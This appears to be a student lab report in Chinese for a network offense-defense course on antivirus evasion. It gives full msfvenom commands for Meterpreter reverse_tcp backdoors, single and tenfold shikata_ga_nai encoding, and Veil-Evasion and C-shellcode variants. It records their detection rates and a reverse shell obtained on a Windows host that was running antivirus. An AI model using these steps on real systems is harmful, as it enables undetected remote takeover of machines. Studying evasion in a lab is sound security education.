20155338《網絡對抗》Exp3 免殺原理與實踐
阿新 • • 發佈:2018-04-10
調用 編寫 上傳 權限 免殺 編譯運行 tcp 檢查 語言
20155338《網絡對抗》Exp3 免殺原理與實踐
實驗過程
一、免殺效果參考基準
Kali使用上次實驗msfvenom產生後門的可執行文件,上傳到老師提供的網址http://www.virscan.org/上進行掃描,有48%的殺軟報告病毒。
二、使用msf編碼器
- 編碼一次,在Kali輸入命令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5338端口號 -f exe >後門名字.exe
結果被查出率降低了,可能是因為進行了編碼的緣故,所以網站監測結果降低了 5個百分點。
- 多次編碼,在Kali中輸入命令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=kali的IP LPORT=5338端口號 -f exe > 後門名字.exe
多次編碼好像和第一次的結果差不多,恢復後依然放入網站檢查。
三、使用Veil-Evasion重新編寫源代碼
- 這裏直接使用的是老師的Kali,veil已經安裝好。
在Kali的終端中啟動Veil-Evasion
命令行中輸入veil,後在veil中輸入命令use evasion
依次輸入如下命令生成你的可執行文件:
use c/meterpreter/rev_tcp.py
- set LHOST Kali的IP
- set LPORT 端口號
- generate
可執行文件的文件名
掃描結果
四、C語言調用Shellcode
首先,在Kali上使用命令生成一個c語言格式的Shellcode數組。
由VS編譯運行生成一個.exe文件
之後放入網站進行檢測,效果還比較客觀,只有百分之20的被查出率
五、實測進行回連
- 按照上次實驗用過的msf監聽方法在Kali上打開監聽,在Win主機開啟殺軟的情況下,運行最後生成的優化版exe文件,Kali成功獲取了Win主機的權限
20155338《網絡對抗》Exp3 免殺原理與實踐